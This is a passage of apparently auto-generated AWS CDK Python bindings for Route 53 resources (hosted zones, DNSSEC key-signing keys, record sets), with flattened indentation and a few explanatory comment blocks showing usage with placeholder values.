def __repr__(self) -> str:
return "QueryLoggingConfigProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
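# Note that required properties are enforced lazily: the keyword-only signature
# rejects positional construction at call time, but presence of a required key
# is only asserted when the getter runs, not in ``__init__``. A stdlib-only
# sketch of that behavior; ``ConfigProperty`` and ``arn`` are illustrative
# stand-ins, not CDK names.

```python
import typing


class ConfigProperty:
    """Illustrative stand-in for a generated single-required-property struct."""

    def __init__(self, *, arn: str) -> None:
        self._values: typing.Dict[str, typing.Any] = {"arn": arn}

    @property
    def arn(self) -> str:
        # The getter, not __init__, enforces presence of the required key.
        result = self._values.get("arn")
        assert result is not None, "Required property 'arn' is missing"
        return typing.cast(str, result)


# Keyword-only parameters: positional construction raises TypeError.
try:
    ConfigProperty("arn:aws:logs:us-east-1:123456789012:log-group:x")  # type: ignore[misc]
    positional_rejected = False
except TypeError:
    positional_rejected = True

# Presence is checked on attribute access; removing the backing entry
# surfaces as an AssertionError from the getter.
cfg = ConfigProperty(arn="arn:aws:logs:us-east-1:123456789012:log-group:x")
del cfg._values["arn"]
try:
    cfg.arn
    lazy_error = ""
except AssertionError as exc:
    lazy_error = str(exc)
```

# This mirrors why the generated getters carry their own assert even though
# the constructor already requires the argument: _values is an ordinary dict.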
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.VPCProperty",
jsii_struct_bases=[],
name_mapping={"vpc_id": "vpcId", "vpc_region": "vpcRegion"},
)
class VPCProperty:
def __init__(self, *, vpc_id: builtins.str, vpc_region: builtins.str) -> None:
'''
:param vpc_id: ``CfnHostedZone.VPCProperty.VPCId``.
:param vpc_region: ``CfnHostedZone.VPCProperty.VPCRegion``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-vpc.html
'''
self._values: typing.Dict[str, typing.Any] = {
"vpc_id": vpc_id,
"vpc_region": vpc_region,
}
@builtins.property
def vpc_id(self) -> builtins.str:
'''``CfnHostedZone.VPCProperty.VPCId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-vpc.html#cfn-route53-hostedzone-vpc-vpcid
'''
result = self._values.get("vpc_id")
assert result is not None, "Required property 'vpc_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def vpc_region(self) -> builtins.str:
'''``CfnHostedZone.VPCProperty.VPCRegion``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-vpc.html#cfn-route53-hostedzone-vpc-vpcregion
'''
result = self._values.get("vpc_region")
assert result is not None, "Required property 'vpc_region' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VPCProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZoneProps",
jsii_struct_bases=[],
name_mapping={
"name": "name",
"hosted_zone_config": "hostedZoneConfig",
"hosted_zone_tags": "hostedZoneTags",
"query_logging_config": "queryLoggingConfig",
"vpcs": "vpcs",
},
)
class CfnHostedZoneProps:
def __init__(
self,
*,
name: builtins.str,
hosted_zone_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.HostedZoneConfigProperty]] = None,
hosted_zone_tags: typing.Optional[typing.Sequence[CfnHostedZone.HostedZoneTagProperty]] = None,
query_logging_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.QueryLoggingConfigProperty]] = None,
vpcs: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.VPCProperty]]]] = None,
) -> None:
'''Properties for defining an ``AWS::Route53::HostedZone``.
:param name: ``AWS::Route53::HostedZone.Name``.
:param hosted_zone_config: ``AWS::Route53::HostedZone.HostedZoneConfig``.
:param hosted_zone_tags: ``AWS::Route53::HostedZone.HostedZoneTags``.
:param query_logging_config: ``AWS::Route53::HostedZone.QueryLoggingConfig``.
:param vpcs: ``AWS::Route53::HostedZone.VPCs``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
}
if hosted_zone_config is not None:
self._values["hosted_zone_config"] = hosted_zone_config
if hosted_zone_tags is not None:
self._values["hosted_zone_tags"] = hosted_zone_tags
if query_logging_config is not None:
self._values["query_logging_config"] = query_logging_config
if vpcs is not None:
self._values["vpcs"] = vpcs
@builtins.property
def name(self) -> builtins.str:
'''``AWS::Route53::HostedZone.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.HostedZoneConfigProperty]]:
'''``AWS::Route53::HostedZone.HostedZoneConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzoneconfig
'''
result = self._values.get("hosted_zone_config")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.HostedZoneConfigProperty]], result)
@builtins.property
def hosted_zone_tags(
self,
) -> typing.Optional[typing.List[CfnHostedZone.HostedZoneTagProperty]]:
'''``AWS::Route53::HostedZone.HostedZoneTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzonetags
'''
result = self._values.get("hosted_zone_tags")
return typing.cast(typing.Optional[typing.List[CfnHostedZone.HostedZoneTagProperty]], result)
@builtins.property
def query_logging_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.QueryLoggingConfigProperty]]:
'''``AWS::Route53::HostedZone.QueryLoggingConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-queryloggingconfig
'''
result = self._values.get("query_logging_config")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.QueryLoggingConfigProperty]], result)
@builtins.property
def vpcs(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.VPCProperty]]]]:
'''``AWS::Route53::HostedZone.VPCs``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-vpcs
'''
result = self._values.get("vpcs")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.VPCProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
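# Illustrative usage (not part of the generated bindings): constructing the
# ``AWS::Route53::HostedZone`` L1 resource whose props struct is defined
# above. ``stack`` is assumed to be an existing ``aws_cdk.core.Stack`` (or
# other Construct scope); the zone name is a placeholder. A minimal sketch:
#
#     zone = CfnHostedZone(
#         stack, "HostedZone",
#         name="example.com.",
#         hosted_zone_config=CfnHostedZone.HostedZoneConfigProperty(
#             comment="Zone managed by CDK",
#         ),
#     )
#
# Optional props such as ``vpcs`` or ``query_logging_config`` accept either
# the corresponding property struct or an ``IResolvable`` (e.g. a token),
# matching the union types returned by the getters above.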
@jsii.implements(aws_cdk.core.IInspectable)
class CfnKeySigningKey(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnKeySigningKey",
):
'''A CloudFormation ``AWS::Route53::KeySigningKey``.
:cloudformationResource: AWS::Route53::KeySigningKey
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
hosted_zone_id: builtins.str,
key_management_service_arn: builtins.str,
name: builtins.str,
status: builtins.str,
) -> None:
'''Create a new ``AWS::Route53::KeySigningKey``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param hosted_zone_id: ``AWS::Route53::KeySigningKey.HostedZoneId``.
:param key_management_service_arn: ``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:param name: ``AWS::Route53::KeySigningKey.Name``.
:param status: ``AWS::Route53::KeySigningKey.Status``.
'''
props = CfnKeySigningKeyProps(
hosted_zone_id=hosted_zone_id,
key_management_service_arn=key_management_service_arn,
name=name,
status=status,
)
jsii.create(CfnKeySigningKey, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-hostedzoneid
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: builtins.str) -> None:
jsii.set(self, "hostedZoneId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="keyManagementServiceArn")
def key_management_service_arn(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-keymanagementservicearn
'''
return typing.cast(builtins.str, jsii.get(self, "keyManagementServiceArn"))
@key_management_service_arn.setter
def key_management_service_arn(self, value: builtins.str) -> None:
jsii.set(self, "keyManagementServiceArn", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-name
'''
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="status")
def status(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Status``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-status
'''
return typing.cast(builtins.str, jsii.get(self, "status"))
@status.setter
def status(self, value: builtins.str) -> None:
jsii.set(self, "status", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnKeySigningKeyProps",
jsii_struct_bases=[],
name_mapping={
"hosted_zone_id": "hostedZoneId",
"key_management_service_arn": "keyManagementServiceArn",
"name": "name",
"status": "status",
},
)
class CfnKeySigningKeyProps:
def __init__(
self,
*,
hosted_zone_id: builtins.str,
key_management_service_arn: builtins.str,
name: builtins.str,
status: builtins.str,
) -> None:
'''Properties for defining an ``AWS::Route53::KeySigningKey``.
:param hosted_zone_id: ``AWS::Route53::KeySigningKey.HostedZoneId``.
:param key_management_service_arn: ``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:param name: ``AWS::Route53::KeySigningKey.Name``.
:param status: ``AWS::Route53::KeySigningKey.Status``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html
'''
self._values: typing.Dict[str, typing.Any] = {
"hosted_zone_id": hosted_zone_id,
"key_management_service_arn": key_management_service_arn,
"name": name,
"status": status,
}
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def key_management_service_arn(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-keymanagementservicearn
'''
result = self._values.get("key_management_service_arn")
assert result is not None, "Required property 'key_management_service_arn' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def name(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def status(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Status``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-status
'''
result = self._values.get("status")
assert result is not None, "Required property 'status' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnKeySigningKeyProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
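# Illustrative usage (not part of the generated bindings): enabling a DNSSEC
# key-signing key on an existing hosted zone. The hosted zone ID and KMS key
# ARN below are placeholders; ``stack`` is assumed to be an existing Construct
# scope. Per the CloudFormation schema, ``status`` must be ``"ACTIVE"`` or
# ``"INACTIVE"``.
#
#     ksk = CfnKeySigningKey(
#         stack, "KeySigningKey",
#         hosted_zone_id="Z00000000000000000000",
#         key_management_service_arn=(
#             "arn:aws:kms:us-east-1:111122223333:key/EXAMPLE-KEY-ID"
#         ),
#         name="example_ksk",
#         status="ACTIVE",
#     )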
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRecordSet(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnRecordSet",
):
'''A CloudFormation ``AWS::Route53::RecordSet``.
:cloudformationResource: AWS::Route53::RecordSet
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
name: builtins.str,
type: builtins.str,
alias_target: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]] = None,
comment: typing.Optional[builtins.str] = None,
failover: typing.Optional[builtins.str] = None,
geo_location: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]] = None,
health_check_id: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
multi_value_answer: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
region: typing.Optional[builtins.str] = None,
resource_records: typing.Optional[typing.Sequence[builtins.str]] = None,
set_identifier: typing.Optional[builtins.str] = None,
ttl: typing.Optional[builtins.str] = None,
weight: typing.Optional[jsii.Number] = None,
) -> None:
'''Create a new ``AWS::Route53::RecordSet``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param name: ``AWS::Route53::RecordSet.Name``.
:param type: ``AWS::Route53::RecordSet.Type``.
:param alias_target: ``AWS::Route53::RecordSet.AliasTarget``.
:param comment: ``AWS::Route53::RecordSet.Comment``.
:param failover: ``AWS::Route53::RecordSet.Failover``.
:param geo_location: ``AWS::Route53::RecordSet.GeoLocation``.
:param health_check_id: ``AWS::Route53::RecordSet.HealthCheckId``.
:param hosted_zone_id: ``AWS::Route53::RecordSet.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSet.HostedZoneName``.
:param multi_value_answer: ``AWS::Route53::RecordSet.MultiValueAnswer``.
:param region: ``AWS::Route53::RecordSet.Region``.
:param resource_records: ``AWS::Route53::RecordSet.ResourceRecords``.
:param set_identifier: ``AWS::Route53::RecordSet.SetIdentifier``.
:param ttl: ``AWS::Route53::RecordSet.TTL``.
:param weight: ``AWS::Route53::RecordSet.Weight``.
'''
props = CfnRecordSetProps(
name=name,
type=type,
alias_target=alias_target,
comment=comment,
failover=failover,
geo_location=geo_location,
health_check_id=health_check_id,
hosted_zone_id=hosted_zone_id,
hosted_zone_name=hosted_zone_name,
multi_value_answer=multi_value_answer,
region=region,
resource_records=resource_records,
set_identifier=set_identifier,
ttl=ttl,
weight=weight,
)
jsii.create(CfnRecordSet, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-name
'''
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="type")
def type(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-type
'''
return typing.cast(builtins.str, jsii.get(self, "type"))
@type.setter
def type(self, value: builtins.str) -> None:
jsii.set(self, "type", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="aliasTarget")
def alias_target(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]]:
'''``AWS::Route53::RecordSet.AliasTarget``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-aliastarget
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]], jsii.get(self, "aliasTarget"))
@alias_target.setter
def alias_target(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]],
) -> None:
jsii.set(self, "aliasTarget", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="comment")
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-comment
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "comment"))
@comment.setter
def comment(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "comment", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="failover")
def failover(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Failover``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-failover
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "failover"))
@failover.setter
def failover(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "failover", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="geoLocation")
def geo_location(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]]:
'''``AWS::Route53::RecordSet.GeoLocation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-geolocation
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]], jsii.get(self, "geoLocation"))
@geo_location.setter
def geo_location(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]],
) -> None:
jsii.set(self, "geoLocation", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="healthCheckId")
def health_check_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HealthCheckId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-healthcheckid
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "healthCheckId"))
@health_check_id.setter
def health_check_id(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "healthCheckId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzoneid
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneName")
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzonename
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneName"))
@hosted_zone_name.setter
def hosted_zone_name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="multiValueAnswer")
def multi_value_answer(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``AWS::Route53::RecordSet.MultiValueAnswer``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-multivalueanswer
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], jsii.get(self, "multiValueAnswer"))
@multi_value_answer.setter
def multi_value_answer(
self,
value: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]],
) -> None:
jsii.set(self, "multiValueAnswer", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="region")
def region(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-region
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "region"))
@region.setter
def region(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "region", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resourceRecords")
def resource_records(self) -> typing.Optional[typing.List[builtins.str]]:
'''``AWS::Route53::RecordSet.ResourceRecords``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-resourcerecords
'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "resourceRecords"))
@resource_records.setter
def resource_records(
self,
value: typing.Optional[typing.List[builtins.str]],
) -> None:
jsii.set(self, "resourceRecords", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="setIdentifier")
def set_identifier(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.SetIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-setidentifier
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "setIdentifier"))
@set_identifier.setter
def set_identifier(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "setIdentifier", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="ttl")
def ttl(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.TTL``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-ttl
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "ttl"))
@ttl.setter
def ttl(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "ttl", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="weight")
def weight(self) -> typing.Optional[jsii.Number]:
'''``AWS::Route53::RecordSet.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-weight
'''
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "weight"))
@weight.setter
def weight(self, value: typing.Optional[jsii.Number]) -> None:
jsii.set(self, "weight", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSet.AliasTargetProperty",
jsii_struct_bases=[],
name_mapping={
"dns_name": "dnsName",
"hosted_zone_id": "hostedZoneId",
"evaluate_target_health": "evaluateTargetHealth",
},
)
class AliasTargetProperty:
def __init__(
self,
*,
dns_name: builtins.str,
hosted_zone_id: builtins.str,
evaluate_target_health: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
) -> None:
'''
:param dns_name: ``CfnRecordSet.AliasTargetProperty.DNSName``.
:param hosted_zone_id: ``CfnRecordSet.AliasTargetProperty.HostedZoneId``.
:param evaluate_target_health: ``CfnRecordSet.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html
'''
self._values: typing.Dict[str, typing.Any] = {
"dns_name": dns_name,
"hosted_zone_id": hosted_zone_id,
}
if evaluate_target_health is not None:
self._values["evaluate_target_health"] = evaluate_target_health
@builtins.property
def dns_name(self) -> builtins.str:
'''``CfnRecordSet.AliasTargetProperty.DNSName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-dnshostname
'''
result = self._values.get("dns_name")
assert result is not None, "Required property 'dns_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``CfnRecordSet.AliasTargetProperty.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def evaluate_target_health(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnRecordSet.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-evaluatetargethealth
'''
result = self._values.get("evaluate_target_health")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
